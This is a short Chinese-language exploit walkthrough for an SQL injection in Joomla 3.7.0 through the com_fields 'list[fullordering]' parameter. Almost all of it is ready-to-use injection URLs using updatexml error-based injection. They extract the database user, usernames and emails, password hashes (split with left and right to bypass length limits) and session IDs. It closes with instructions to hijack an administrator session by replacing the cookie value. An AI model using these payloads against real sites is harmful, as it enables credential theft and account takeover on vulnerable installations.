Joomla 3.7.0 SQL注入漏洞利用
1.注入语句
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)
2.注入用户名,邮箱,密码
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)
因为updatexml爆错注入时,有长度限制,所以这里结合left和right函数,注出密码字段
3.注入session_id
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select session_id from %23__session where username in (select username from %23__users))),1)
4.注意
![]()
如上图所示,在session表中,一共有四条记录,但是只有第二条username不为空的session_id才可以登陆,登陆方法:访问后台页面,用firebug直接修改cookie的值就好了